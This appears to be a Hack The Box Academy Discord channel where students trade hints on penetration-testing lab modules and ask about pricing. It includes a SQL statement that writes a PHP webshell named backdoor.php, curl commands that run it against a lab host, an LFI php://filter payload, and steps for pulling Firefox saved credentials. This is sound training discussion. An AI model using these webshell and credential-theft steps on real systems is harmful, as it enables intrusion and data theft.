[Module: Attacking Common Services] [Section: Attacking SQL Databases] have mssql credentials but can't login? Is this intentional?
/shrug what error do you specifically get
You're probably missing the -windows-auth flag
I'm pretty new to this scene, I'm working through the Windows Priv Esc module. Often in the examples I will be working in a PS or CMD shell and go through efforts to setup a Reverse Shell through MSFvenom or NetCat. I don't yet understand the advantages of a RevShell over Powershell, can anyone explain this? Thank you in advance
a powershell can also be a reverse shell, reverse shell just means the victim calls back to the attacker and not the other way around
revshell and powershell arent comparable
theyre different concepts entirely
your revshell can BE powershell
if you mean what's the benefit of a meterpreter msf-shell, it has a bunch of nice inbuilt functionality that isn't as easy to get with powershell (like running post-exploit modules or upload/download of files)
Good Afternoon, can someone give me a nudge on the Linux Priv Escalation Skill Assessment? The last flag is what I'm having trouble with
Hint also will be blest
footprinting medium
|| I cannot find the htb user and password anywhere in SSMS, am I supposed to be writing a SQL query or am I just being blind? ||
i wrote a query but it only lists the columns and as being empty
anyone able to give any advice pretty please 🙂
hi everyone, I'm in the AD enumeration & attacks module, in the Privileged Access section, can someone help me with this error?
i'm in the last question - Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.
Did you try it without "-windows-auth?"
Yeah, now i see, i didn't look at it
That IP looks like an internal IP address, you sure 10.10.14.79 can reach it?
madf0x me next pls 
but indeed also mixing a domain login with local auth login is likely to not work once they do resolve the connection issue
okay so I'm on broken authentication predictable reset token, and I'm running a modified version of the reset_token_time.py script, however it isn't finding anything. can I DM someone?
idr I just clicked around till I got what I needed
In which databases did you try to write the queries?
i just did it on accounts
You're on the right track then, just write good query
Gj
welp onto hard now
You can do it
i did right click on the most suspicious table > edit first 200 entries
yeah tbh footprinting kinda just brushes over mssql ¯\_(ツ)_/¯
It's not until attacking common services that they dive deeper in it
This footprinting hackthebox academy hard lab is tough
Yep
Aren't pwnboxes on private networks? I'm getting 10 requests a second for a smb server I set up. From random user. As in it's trying to log in.
What's the ip?
Be my senpai on this please
If it's a 10.10.x.x it's another htb user
Hard to know how to help when you don't say where you're stuck, if it's the foothold, pay attention to the wording of the engagement and what ports are open
After the foothold it's fairly straightforward from point a-z
I will be precise when Im on my computer
I panicked and closed it all down. It was trying to bruteforce the user + password
I'm sure the smbserver has a logfile
Ama check it, restarted pwnbox though
oh you're using the browser pwnbox? ¯\_(ツ)_/¯
If you're using the in-browser vm (pwnbox) you really don't have anything to worry about
yeye i am
They can't get to your physical machine from the pwnbox
As it's hosted on htb infra
okey okey, got me stressed. Probably gonna set 10 character passwords on my own vm from now on.
I understand I need to use ||php://filter/convert.base64-encode/resource=*|| to get the loaded page
but I can't make it to work ...
any tips??
ok I solve it in a single shot but I think in a less organized way....
someone up 4 consulting ??
I am doing tier 0 - first module - the free ones . I think i am running the vm correctly -
─[us-starting-point-2-dhcp]─[10.10.14.100]─[htb-vikingjohann@htb-kovflyfgim]─[~/my_data]
└──╼ [★]$ sudo login
htb-kovflyfgim login: .... How can i get a hint as how to login and find the flag txt file ?
i used the ssh port as it was open - the walkthrough has the telnet port open
did not finish in two hours - darn
#starting-point is a different thing: read #welcome on how to access more of the server
okay ... um i was attempting a module I thought ... the first and ran out of time before i could login and find the flag
Your copy/paste indicates you're using and connected to the starting point VPN and labs on https://app.hackthebox.com; this chat is for the learning modules on https://academy.hackthebox.com. For clarity: labs refer to the main site, modules refer to academy.
Double quote the query, single quote the powershell command
ok., lemme try it
Can anyone help me with question in:
https://academy.hackthebox.com/module/237/section/2613
Module: Introduction To Digital Forensics
part: "Practical Digital Forensics Scenario"
Q1: Extract and scrutinize the memory content of the suspicious PowerShell process which corresponds to PID 6744. Determine which tool from the PowerSploit repository (accessible at https://github.com/PowerShellMafia/PowerSploit) has been utilized within the process, and enter its name as your answer
I did try to dump the process memory associated with pid 6744, and ran yara rule against it, but yara result only shows cobaltStrike
didn't work
same
Unrelated question to the modules, but running into issues configuring my VM to use for both labs and academy, I usually use the pwnbox but now want to host my own VM with tools hosted on my machine. But for some reason any machine IP on HTB I cannot ping or run say a nmap scan on, I am connected to openvpn and I am able to access the internet through my VM and download updates and dependencies so not sure what’s wrong with my VM
I feel it might be a setting in my VM, the options are ‘emulate VLAN’ ‘Bridged’ and ‘Host-Only’
is there a discount for students? and if so how much is it. I see that the standard cost is like 490 a year
if you're a student, its $8 per month
Yup, there is special pricing for educational institutions, but your institution will need to enrol with us. Check out https://www.hackthebox.com/universities/contact-us, and speak to your tutors 🙂
Does that give you unlimited access to all modules and labs?
is the sans institute on the list?
it gives you access to academy up to and including tier 2 modules
the main platform, and the pro labs are separate subscriptions, and anything tier 3 or 4 on academy is not included
I'd advise speaking to your tutors. They're best placed to say whether or not your institution is enrolled
sorry, I assumed we were just talking about the student sub on academy, since it's the modules channel
Yeah, me too.. the Academy modules and the Labs are separate, but there is still preferential pricing for educational institutions with regards to Labs. Reach out to your tutors, and ask them to reach out to us if they are interested in enrolling 
cool to know, thanks!
looks like the 8 dollar a month is available to me
then seize the opportunity
if I want to get level 3 or higher classes what is the most cost effective way to do that?
platinum subscription
but it's gonna be a long time before you run out of things to do
plus you get cubes from modules you complete
yeah I will sign up
want to get some extra prep work for the GX certs from SANS
just signed up
so on the labs side its 20 a month in addition to the 8 a month on the academy side?
For VIP+ the normal price is $20, so perhaps I was mistaken on the preferential pricing for the Labs as well
If you'd like to reach out to us, raise a help request via https://help.hackthebox.com 🙂
Hack The Box Help Center
The discount is applicable for individual students on Academy, but for app.hackthebox.com, it involves more of a relationship with the institution
Hey I got it. It was not as hard as I thought. IMAP commands can be confusing sometimes...that was it. Thanks anyways for the offer of help, big love.
If you're learning, Academy is where you want to be anyway 🙂
Once you've gained confidence and knowledge, the OG HTB platform will give you the opportunity to test your skills against machines, without guided notes
Hey np if you use discord search feature I actually linked a way useful website for imap commands
Like way long ago
There is plenty of free content on app.hackthebox also, but obviously VIP/VIP+ grants a number of benefits
Good luck on your learning journey 
thanks
Hi g0blin ^^
@ocean night What if our institution already has a partnership with HackTheBox and we get free labs on a rolling basis, could we still get a discount for purchasing an individual subscription?
On the mend after almost spiraling
Alright, appreciate the support. Was a freshman to discord. I will use search feature ❤️
I'd advise reaching out to us on the above contact points to discuss this. I'm afraid I'm not the person to provide guidance on this point 🙂 I'm the tech dude
Glad to hear it, you got this
Did you just nosedive, or something triggered? :\
Got fired and struggling to find a job, moving back in with parents soon.tm
Ahhh shit man, I'm sorry to hear that
Fingers crossed you get back up and find somewhere better soon ❤️
Alright, thanks. Im on cpts path. It has been quite rough for a fresh starter on some labs 🙂
Keep on keeping on, study, document, practice and repeat. Not always gonna be easy, but the feeling when you crack a module and solve it.. winning
Im trying, thanks. 🙂 Finished the starting point labs in HackTheBox, doing cpts path in academy. Time is precious
did you do the Information Security Foundations path or you dove straight into CPTS?
Straight into CPTS. Maybe thats why its tough for me on couple of labs
yeah, having a strong foundation is important, CPTS expects you to know everything there already
Alright. Thats a really good suggestion. Although I study information security masters and graduated from computer science, pentesting is something else.
Thanks!
then you probably already do know a lot of it, should be quick to get through
Perfect. Thanks. Appreciated
Anybody can provide some hints for question 3 in Introduction to Splunk and SPL?
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes.
sucks to hear bro. The market is shit right now. I can't find a job to save my life
I can't find the snmp service even though I port scanned it multiple times and tried to grab banner also but snmp doesn't exist at all
hey
"hashcat -a 0 -m 1000 hash.txt mywordlist.txt", after I enter it, it says password cracked
Firewall evasion
and I type "hashcat -m 1000 --show --username hash.txt", but at the end there isn't any cracked password
could someone clarify that for me?
tried this with john as well, same stuff
Already did that, but I can't even connect to the snmp instance
try hashcat -m 1000 hash.txt --show
what command did you use
snmpwalk -v2c -c public
did not work, returned hash and blank space
wrong community string
you have to find the community string before you run this command
can you dm me the sc
Oh yea worked
Currently on the ad session, using bloodhound. One query in bloodhound is 'List all Kerberoastable Account' . What makes an account Kerberoastable?
does this literally mean no password needed at all?
Password Attacks-Hard, guys can someone give a hint for Johanna password word from mut_password.list
it's in the list and shouldn't take too long to get, idk what else to tell you
make sure you're using the correct options
I use cme with the complete list on smb; before turning it on I use the tac command to reverse mut_password.list, so from two terminals, and after 3 hours nothing
did you use --local-auth?
nope
is johanna username case sensitive maybe ? J or j
Windows usernames aren't case sensitive
thanks, I will try now with local auth. and why does HTB make this type of lab?
we are not here to spend hours on tasks, we are here to learn how to do something for the job
Hey morning guys, can someone give me a nudge in windows priv | Which account has WRITE_DAC privileges over the \pipe\SQLLocal\SQLEXPRESS01 named pipe?...... I was able to get a result using the example in the course's notes, however for this specific pipe I'm getting an error "All pipes busy"-"could not be found"
the use of the --local-auth flag is very much explained in the modules
there's nothing wrong with the lab or its difficulty
How can I list all emails on an IMAP server
I already logged in and now want to read the emails in the Important category
a LIST "" *
- LIST (\HasNoChildren \UnMarked) "." Notes
- LIST (\HasNoChildren) "." Meetings
- LIST (\HasNoChildren \UnMarked) "." Important
- LIST (\HasNoChildren) "." INBOX
Doing this room
https://academy.hackthebox.com/module/112/section/1080
check hacktricks
what is the result/output you're getting? Please use the "spoiler tags" in case there is anything you may consider as a spoiler
in windows privesc, section DNSAdmins how can i get that mimilib.dll?
by downloading the latest release from Github
but i should modify kdns.c for adding a system command to be run when the dns will be restarted?
In the course material is mentioned the following: "As detailed in this post: http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html"
ik that I should build mimikatz, but didn't find a good resource
but it didn't show how
dusts this off #modules message
ah, yeah, if you have to modify something, you'd have to build it yourself
didn't find a good resource
don't know if there's anything specific on mimikatz, just follow a generic guide on how to build from source and modify what's necessary
i have vs 2022, but in https://github.com/gentilkiwi/mimikatz#build they mention that i should use 2010 ..., so should i downgrade it?
I can't really help much with the details as I haven't reached that module yet
if you're running kali you can type mimikatz in the terminal and it'll take you to usr/share with mimikatz in there
not sure if that works on pwnbox
no, I want a custom version of mimilib.dll (a .dll inside the mimikatz project), but thanks
its in there
i should modify some of its files then rebuild it, not the released version
I'm doing the command injection module, at the Advanced Command Obfuscation challenge it requires you to get the output of this command: find /usr/share/ | grep root | grep mysql | tail -n 1 . I have managed to run it, however I do not get the results of this command, can any1 help me with this?
Hello guys, I'm doing the Password Attacks module, and precisely the Pass the Hash method. A question is: Using David's hash, perform a Pass the Hash attack to connect to the shared folder \\DC01\david and read the file david.txt.
So I've succeeded in connecting with David's account using the PtH attack, but I can't access the shared file, "no permission"
Is this normal and do I have to find another thing?
Hello anyone finished the visual htb? I need a little hint I managed to host a simple git repo with: .cs, .csproj, .sln files however It takes too long so basically it gets first some .git/objects/.... and then after a long wait the website says "Not found"
And don't spoil active boxes
It doesn't give seasonal points anymore, but it's still very much an active box
its only like 3 weeks old
I see okay my bad
On AD module / Kerberoasting from Linux. Trying to install Impacket with 'git clone <github url>' and get error "fatal: unable to access 'https://github.com/fortra/impacket.git/': Could not resolve host: github.com" from attack host.
What might I be doing wrong?
does the box have internet access
yes
Try removing the final / after Impacket.git
And you're sure the box has internet? What if you ping 8.8.8.8
Impacket should already be present on the Pwnbox btw
does the box not have impacket? try typing psexec.py
do you mean the target box?
attack box usually means where you are attacking from
i think most (if not all) of impacket gets run from the attack host
Hi guys, am I allowed to post my HTB question here?
I just set up a pivot and did everything from my own machine
if its about academy, else it'll be another channel
We can't know that without more details
What kind of question?
guys I'm doing file inclusion, I just started, wanna ask you: if we don't have the php code it's hard to know what to use to bypass the restriction. in the real world or in the exam, do we fuzz this with a wordlist or do we do them manually?
One of the many credential hunting methods I used in the 'Credential Hunting in Linux' section produced results that show Will's home directory.
https://academy.hackthebox.com/module/147/section/1320
I don't need to now try out any of the other linux hunting credentials now that I am in Wills home directory?
Hmm Impacket was already installed on the target. Must have missed it.
Cheers for the reply 🙂
@river aspen u need to specify a port value
also SERVER_IP is a 32-bit number in the form X.X.X.X where X is a number in the set {0,...,255}
(ipv4)
as you can infer, both values have to be numbers and NOT strings
I copied it from here
If I type in set RPORT PORT 8080 it doesn't work as well, what port should I use?
RPORT 8080
it's using PORT and SERVER_IP as ersatz for the actual values since they vary from one student to another
im not sure that RPORT is 8080, proxies is set to 8080.. the web service use 8080 also ?
you're running this against yourself...
which module you mean ?
127.0.0.1 is localhost
@river aspen u need to set the target ip and port, and use local proxy like burp at 127.0.0.1:8080
the module indicate to you an ip address ?
ok the question say to use a different auxiliary (auxiliary/scanner/http/http_put), open burpsuite and set proxies in msfconsole to 127.0.0.1... So, u can try this on any website and the answer is the last line in the burp request @river aspen
Should I use it on a previous given IP?
I think I spawned a target from a previous section and used that
Hello there, I've been stuck for 2 days on Module: Linux Priv Esc, Section: Logrotate, here is the output, Waiting for rotating ||/tmp/tmp.log...||, could anyone help please?
That's the safest option
you don't need a target as you are going to intercept the exploit
thats the point of the exercise
also there is no ||"cat: /etc/logrotate.conf: No such file or directory"||
if the previous IP is active and has a http service running yes
I am trying the browser method now and I can't find the 'firefox_decrypt.py' python tool no matter which locate method I try.
Thank you all, finished the task.
Hi any. Need help in Attacking DNS section. I found all possible subdomains
Next i try dig @MY_IP subdomain.inlanefreight.com - and i have response
But when i try dig axfr @MY_IP subdomain.inlanefreight.com - i got error and 0 information
Any help? Thanks
You need to transfer it over
download it from a website?
Because you're meant to use the bruteforce tool
or from my attacking machine?
Are you sure you should use com and not htb?
From attack machine, the labs don't have internet access
That was clear. Done. Ty all
I also tried using the three methods to find the file on the attacking machine, as well as trying to update one of the methods to get 'locate' to run.
Well you'll need to download it and transfer
Not all tools from the modules are in the pwnbox
so go on the web and download it from the attacking machine?
Yes
I think that you're looking for this https://github.com/unode/firefox_decrypt, u should download it and transfer it to the machine as @fathom pendant said
There's a link in the module
As well
u're right
different hosts, proxies is on localhost
its easier to do wget -r pointing to the .profiles folder
set up an http server in the victim machine
and you run firefox_decrypt locally
add target ip to /etc/hosts as inlanefreight.htb -> then dig AXFR @inlanefreight.htb foundsubdomain.inlanefreight.htb
use ip after @, not a domain
Also, before trying to do a zone transfer:
echo "inlanefreight.htb" > ./resolvers.txt
./subbrute inlanefreight.htb -s ./names.txt -r ./resolvers.txt
Noob beginner here, can anyone tell me a good resource to start with, I was following the roppers course earlier but it seems too boring
if you add the ip and domain to your /etc/hosts you can use the domain because it will resolve the IP
never use a domain as a NameServer. The domain must otherwise be resolved by the NameServer
or by your hosts file
By the way, the exact FQDN of the resolver in this lesson would be ns.inlanefreight.htb 😉
In a real-world scenario, yes, you wouldn't use a local IP mapping to try and do DNS zone transfers, but in this case you're using subbrute anyway and not querying external DNS servers, and it is mentioned in the module to use this tool on internal engagements on machines with no internet access
haha yep, you're right. it still resolves it though 😉
Yes of course, you can also use ns.mydomain.bullshit. This also works if you put it in the hosts file with the correct IP.
It doesn't matter what name you put in the hosts file. The name simply points to the IP.
guys i am struggling in module Attack Common Service: Attacking Common Services - Easy after SELECT '<?php system($_GET["cmd"]; ?>' INTO OUTFILE 'C:/xampp/htdocs/backdoor.php'; and curl -w "\n" http://10.129.203.7/?backdoor.php?c=type C:\\Users\\Administrator\\Desktop\\flag.txt nothing happened
In your shell you write cmd as parameter, but then specify c as parameter.
Create a Python HTTP server on the target machine. On the attacker machine, execute the following wget command (make sure to replace the IP address with that of the target)
wget -r http://10.10.10.69:8000 /.mozilla/firefox/*
@plain coral
i tried curl -w "\n" http://10.129.203.7/?backdoor.php?cmd=type C:\\Users\\Administrator\\Desktop\\flag.txt but still
Module:Attacking common services Section:Attacking DNS --> have to find a flag in any records??? Dont know how to get the flag anymore - tried subdomain enum with dnsenum and then zonetransfer - but everything fails - any hints?
Have a look at a few comments above
why 10.129.203.7/?
delete the question mark there
subbrute and nameserver is inlanefreight.htb use names_small.txt
damn im struggling with footprinting lab hard
No, Nameserver is not inlanefreight.htb
oh you re right
┌──(root㉿kali)-[/home/elliot]
└─# curl -w "\n" http://10.129.203.7/backdoor.php?cmd=type C:\\Users\\Administrator\\Desktop\\flag.txt
<br />
<b>Parse error</b>: syntax error, unexpected ';', expecting ')' in <b>C:\xampp\htdocs\backdoor.php</b> on line <b>1</b><br />
i del the question mark
Take a look at the webshell you created. You have forgotten one )
done, appreciated
Where are you up to?
thank youuu